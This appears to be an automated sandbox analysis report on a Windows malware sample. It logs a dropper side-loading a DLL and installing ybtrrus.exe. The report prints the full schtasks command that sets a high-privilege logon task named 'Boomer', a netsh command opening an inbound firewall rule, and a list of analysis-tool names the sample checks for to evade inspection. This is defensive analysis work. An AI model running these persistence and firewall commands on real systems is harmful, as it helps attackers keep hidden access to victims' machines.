Source: C:\temp333\install_2.dll Process created: C:\5p9SnCM5jV\ybtrrus.exe "C:\5p9SnCM5jV\ybtrrus.exe"
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\5p9SnCM5jV\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\5p9SnCM5jV\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\5p9SnCM5jV\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\5p9SnCM5jV\ybtrrus.exe" enable=yes profile=any
Source: unknown Process created: C:\5p9SnCM5jV\ybtrrus.exe C:\5p9SnCM5jV\ybtrrus.exe
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1764 -s 556
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Section loaded: sspicli.dll
Source: C:\temp333\install_2.dll Section loaded: apphelp.dll
Source: C:\temp333\install_2.dll Section loaded: g2m.dll
Source: C:\temp333\install_2.dll Section loaded: secur32.dll
Source: C:\temp333\install_2.dll Section loaded: vcruntime140.dll
Source: C:\temp333\install_2.dll Section loaded: cryptbase.dll
Source: C:\temp333\install_2.dll Section loaded: sspicli.dll
Source: C:\temp333\install_2.dll Section loaded: mswsock.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: apphelp.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: version.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: mpr.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: wininet.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: wsock32.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: winmm.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: uxtheme.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: devobj.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: msasn1.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: c_is2022.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: c_g18030.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: c_gsm7.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: c_iscii.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: netapi32.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: netutils.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: olepro32.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: msimg32.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: kernel.appcore.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: windows.storage.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: wldp.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: unrar.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: 7zxa.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: winhttp.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: shfolder.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: iphlpapi.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: magnification.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: wtsapi32.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: d3d9.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: dwmapi.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: security.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: secur32.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: sspicli.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: colorui.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: mscms.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: userenv.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: coloradapterclient.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: compstui.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: inetres.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: textshaping.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: windowscodecs.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: propsys.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: profapi.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: wkscli.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: cscapi.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: winsta.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: fwpuclnt.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: idndl.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: mlang.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: textinputframework.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: coreuicomponents.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: coremessaging.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: ntmarta.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: wintypes.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: edputil.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: urlmon.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: iertutil.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: srvcli.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: windows.staterepositoryps.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: appresolver.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: bcp47langs.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: slc.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: sppc.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: onecorecommonproxystub.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: wbemcomn.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: sxs.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: napinsp.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: pnrpnsp.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: wshbth.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: nlaapi.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: mswsock.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: dnsapi.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: winrnr.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: rasadhlp.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: amsi.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: d3d10warp.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: resourcepolicyclient.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: dxcore.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll
Source: C:\5p9SnCM5jV\ybtrrus.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Q0cWJo6Jvh.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: Q0cWJo6Jvh.exe Static file information: File size 2611774 > 1048576
Source: Q0cWJo6Jvh.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: g2m.pdb source: install_2.dll, 00000002.00000002.3341287236.000000006D39D000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: d:\Projects\WinRAR\rar\build\unrardll32\Release\unrar.pdb source: install_2.dll, 00000002.00000003.2491716669.000000000254D000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000005.00000002.3378900514.000000006CAC5000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: install_2.dll, 00000002.00000002.3339175057.0000000000402000.00000002.00000001.01000000.00000004.sdmp, install_2.dll, 00000002.00000000.2124176727.0000000000402000.00000002.00000001.01000000.00000004.sdmp
Source: C:\temp333\install_2.dll Code function: 2_2_6D1D27E0 DllMain,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 2_2_6D1D27E0
Source: g2m.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x298261
Source: install_2.dll.0.dr Static PE information: real checksum: 0xe72d should be: 0x13d74
Source: Q0cWJo6Jvh.exe Static PE information: section name: .xdata
Source: Q0cWJo6Jvh.exe Static PE information: section name: /4
Source: Q0cWJo6Jvh.exe Static PE information: section name: /19
Source: Q0cWJo6Jvh.exe Static PE information: section name: /31
Source: Q0cWJo6Jvh.exe Static PE information: section name: /45
Source: Q0cWJo6Jvh.exe Static PE information: section name: /57
Source: Q0cWJo6Jvh.exe Static PE information: section name: /70
Source: Q0cWJo6Jvh.exe Static PE information: section name: /81
Source: Q0cWJo6Jvh.exe Static PE information: section name: /97
Source: Q0cWJo6Jvh.exe Static PE information: section name: /113
Source: 7zxa.dll.2.dr Static PE information: section name: .didata
Source: C:\temp333\install_2.dll Code function: 2_2_6D22EDFE pushfd ; retf 2_2_6D22EE01
Source: C:\temp333\install_2.dll Code function: 2_2_6D22EF74 push esi; retf 2_2_6D22EF77
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CABDE65 push ecx; ret 5_2_6CABDE78
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 14_2_00B24CEC push edx; retf 14_2_00B24CED
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 14_2_00B2485D push cs; retf 14_2_00B24869
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 14_2_00B2690D push dword ptr [eax]; iretd 14_2_00B2691D

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe File created: C:\temp333\install_2.dll
Source: C:\temp333\install_2.dll File created: C:\5p9SnCM5jV\7zxa.dll
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe File created: C:\temp333\g2m.dll

Boot Survival

Source: C:\5p9SnCM5jV\ybtrrus.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\5p9SnCM5jV\ybtrrus.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\5p9SnCM5jV\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\5p9SnCM5jV\ybtrrus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\5p9SnCM5jV\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\5p9SnCM5jV\ybtrrus.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\5p9SnCM5jV\ybtrrus.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Battery
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: PROCESSHACKER.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: PROCMON.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: AUTORUNSC.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: OLLYDBG.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: X64DBG.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: REGMON.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: WINDBG.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: AUTORUNS.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: IMPORTREC.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: PETOOLS.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: PROC_ANALYZER.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: SNIFF_HIT.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: FIDDLER.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: IDAQ.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: SYSANALYZER.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: DUMPCAP.EXE
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: WIRESHARK.EXE
